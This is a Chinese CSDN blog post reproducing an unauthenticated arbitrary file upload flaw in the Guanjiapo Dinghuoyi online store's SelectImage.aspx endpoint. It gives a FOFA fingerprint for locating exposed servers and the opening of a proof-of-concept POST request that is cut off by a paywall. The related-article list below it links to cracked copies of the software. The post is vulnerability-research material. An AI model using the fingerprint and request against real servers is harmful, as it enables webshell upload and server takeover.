管家婆订货易在线商城任意文件上传漏洞复现

最新推荐文章于 2024-08-07 19:39:11 发布
最新推荐文章于 2024-08-07 19:39:11 发布
阅读量828 收藏 4
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134518781
版权
本文介绍了管家婆订货易的在线商城存在的一个安全漏洞,详细阐述了漏洞概述、复现环境及复现过程。攻击者能够利用此任意文件上传漏洞,未经认证即上传恶意文件,可能导致服务器被完全控制。修复方案包括限制文件上传权限,使用黑白名单过滤,并关闭不必要的互联网暴露面。
摘要由CSDN通过智能技术生成

0x01 产品简介

    管家婆订货易,帮助传统企业构建专属的订货平台,PC+微信+APP+小程序+h5商城5网合一,无缝对接线下的管家婆ERP系统,让用户订货更高效。支持业务员代客下单,支持多级推客分销,以客带客,拓展渠道。让企业的生意更轻松。

0x02 漏洞概述

  管家婆订货易在线商城SelectImage.aspx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件,深入利用可造成代码执行和服务器失陷。

0x03 复现环境

FOFA:icon_hash="-1513302527"

0x04 漏洞复现

PoC

POST /DialogTemplates/SelectImage.aspx?type=titleimg&size=30*100&pageindex=1&iscallback=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=532c7611457d40f4ae4cd9422973416
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现管家婆订货在线商城-VshopProcess-任意文件上传
知黑而守白
03-05 370
管家婆订货,集合PC商城+微信商城+微信小程序+APP商城+h5商城四网合一网上订货商城系统,无缝对接管家婆软件,实现商品、库存、订单、客户、财务等数据无缝对接!管家婆订货系统 VshopProcess 接口存在一个任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
漏洞复现订货管家婆在线商城 VshopProcess 任意文件上传漏洞
失心少年
03-09 155
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!管家婆订货,是一个帮助传统企业构建专属的订货平台的系统,包括PC+微信+APP+小程序+h5商城5网合一。管家婆订货在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,未授权的攻击者可以利用此漏洞上传恶意文件最终导致服务器被远控。
Goby 漏洞发布|管家婆订货在线商城 SelectImage.aspx 文件上传漏洞
m0_46699477的博客
09-15 246
任我行率先针对中小企业推出了管家婆进销存、财务一体化软件。管家婆订货在线商城存在 SelectImage.aspx 任意文件上传漏洞,攻击者可通过该漏洞可控制整个系统,最终导致系统处于极度不安全状态。
管家婆用户进程中发生浮点异常错误_SpringBoot中的潜在漏洞分析
weixin_42347925的博客
01-22 324
Spring Boot是由Pivotal团队提供的全新的开源框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application development)成为领导者。现在很多研发团队开始转向采用该框架,但是这个框架经过使...
管家婆订货美迪订通订货商城系统支持辉煌分销服装饰品等系列
02-22
美迪订通·无缝对接管家婆/捷软进销存软件订货系统,电脑商城微信商城APP商城都有,营销功能模块也挺好用的,看上的就是它能和管家婆进销存软件商品客户库存订单价格同步。
管家婆订货通破解版7.0全系列支持辉煌分销服装等等
11-14
管家婆订货通破解版7.0全系列支持辉煌分销服装等等,替换1个文件就可以了,永久有效,我自己测试过的,在网上找的
管家婆辉煌2代9.2原版安装文件
03-24
管家婆辉煌2代9.2原版安装文件
管家婆分销ERP A8V9.5.1 破解文件
02-02
管家婆分销ERP A8V9.5.1 破解文件
管家婆辉煌2安装文件
03-18
"管家婆辉煌2"是一款针对中小企业管理的财务和进销存软件,主要目的是帮助企业实现高效、规范的业务...而"管家婆辉煌Ⅱ+10.22"这个文件可能是该软件的安装程序,用户可以通过下载并运行此文件来安装和使用管家婆辉煌2。
小管家进销存_管家婆物联宝微订货V2.3发版公告
weixin_39721807的博客
11-08 208
跨端互联,业务互通小程序&APP,实现跨平台订单流程全处理NO.1小程序支持大单位订货批发行业的福音!支持设置大单位订货,再也不用担心客户选错商品单位啦~NO.2ERP后台菜单整合后台菜单全新整合,客户配置更轻松~NO.3客户账号支持短信通知客户账号批量生成,但逐一通知客户效率太低?别担心,微订货帮您发送短信通知到客户手机!叮~“您的商家已为您注册微订货账号:139****...
【系统架构设计师】二十四、安全架构设计理论与实践②
帅次的博客
08-04 787
安全技术体系架构是对组织机构信息技术系统的安全体系结构的整体描述。安全技术体系架构的目标是建立可持续改进的安全技术体系架构的能力。根据网络中风险威胁的存在实体划分出5个层次的实体对象:应用、存储、主机、网络和物理。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 899
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
乐凡三防平板|车载三防平板电脑:为行车安全提供保障
livefan的博客
08-05 276
1.提升行车安全:车载三防平板电脑可以实时显示车辆信息,为驾驶人员进行导航指引和路况提醒等,帮助驾驶人员更好地掌握行车情况,为行车安全提供重要保障。3.便于安装与使用:车载三防平板电脑设计紧凑、安装简便,有着多种安装固定方式,几乎可以匹配任意车载工作场所,比如叉车、堆高机、汽车、卡车等。1.防水防尘:车载三防平板电脑具备防水、防尘的性能,可以在恶劣的环境中保持正常工作。2.强大功能集成:车载三防平板电脑的功能多样,不仅具备导航、音乐、蓝牙等基本功能,还可灵活拓展NFC、航空插头接口等,以满足不同工作需求。
访问网站显示不安全怎么办?
joySSL_的博客
08-02 664
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
最新发布
洛秋的博客
08-07 988
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、于开发、方便用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
鸿蒙系统开发【ASN.1密文转换】安全
2301_76813281的博客
08-02 696
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
AI技术如何重塑企业EHS安全健康环保体系,附实践案例
云说智数的博客
08-06 408
在某大型电子工厂中,AI系统通过分析生产数据和环境监测数据,成功预测了一起可能的化学泄漏事故,并及时通知了管理人员采取措施,避免了潜在的环境污染和人员伤亡。某化工厂在发生泄漏事故后,利用AI系统对事故进行了深入分析,不仅快速定位了泄漏源,还发现了操作规程中的缺陷,并据此更新了操作手册,提高了整体的安全管理水平。通过这些实际应用案例,我们可以看到AI技术在EHS管理中的应用潜力和实际效果,它不仅提高了风险管理的效率和准确性,还增强了企业对复杂EHS挑战的应对能力。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 607
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
【SQL Server】端口安全配置:SQL Server的安全最佳实践与防火墙规则配置
weixin_43298211的博客
08-03 977
在进行任何网络或数据库系统的部署时,确保安全是至关重要的。SQL Server,作为企业级数据库平台,提供了丰富且强大的安全功能。使用加密连接是保护 SQL Server 通信安全的重要手段。防火墙是 SQL Server 安全的第一道防线。完成上述步骤后,Windows 防火墙将允许端口 1434 上的流量,从而确保 SQL Server 可以接收客户端连接。命令配置 SQL Server 使用证书进行加密连接。在上面的示例中,先加载必要的 PowerShell 模块,定义了证书的拇指印。
如何把管家婆辉煌备份文件恢复到管家婆erp h3
09-25
要将管家婆辉煌备份文件恢复到管家婆ERP H3,需要按照以下步骤进行操作: 1. 准备好辉煌备份文件:首先确保你已经备份了管家婆辉煌的文件。通常,备份文件会以数据库备份文件和相关配置文件的形式存在。 2. 安装管家婆ERP H3:确保已经在目标计算机上成功安装了管家婆ERP H3。这包括安装数据库、web服务器和管家婆ERP H3系统。 3. 备份目标数据库:在进行恢复操作之前,为管家婆ERP H3的数据库进行备份。这样可以确保在恢复过程中出现任何问题时,能够回退至原始状态。 4. 停止管家婆ERP H3服务:在进行数据库恢复之前,需要停止管家婆ERP H3的服务。可以通过停止相关服务或进程来实现。 5. 还原备份文件:将管家婆辉煌备份文件中的数据库备份文件还原到目标数据库中。这可以使用数据库管理工具完成,例如MySQL数据库,可以使用MySQL命令行或图形化工具来还原备份文件。 6. 还原配置文件:将辉煌备份文件中的相关配置文件还原到管家婆ERP H3系统的相应位置。这些配置文件包括系统配置、模块配置以及用户权限等。 7. 启动管家婆ERP H3服务:在完成备份文件恢复操作后,启动管家婆ERP H3服务,确保系统能够正常工作。 8. 验证恢复结果:登录管家婆ERP H3系统,验证数据和配置是否已成功恢复。检查数据的完整性和准确性,并确保系统功能正常。 通过以上步骤,你可以将管家婆辉煌备份文件成功地恢复到管家婆ERP H3系统中,使得系统能够正常运行并保持数据的一致性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值